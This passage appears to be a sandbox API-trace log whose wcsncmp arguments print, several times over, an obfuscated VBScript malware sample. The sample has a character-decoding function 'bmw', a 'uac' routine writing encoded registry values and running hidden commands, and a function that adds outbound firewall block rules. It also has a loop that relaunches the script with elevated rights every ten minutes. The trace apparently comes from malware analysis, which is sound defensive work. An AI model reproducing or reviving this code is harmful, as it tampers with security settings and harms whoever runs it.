bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.940] wcsncmp (_String1="1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.941] wcsncmp (_String1=",1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.941] wcsncmp (_String1="1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.941] wcsncmp (_String1=",1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 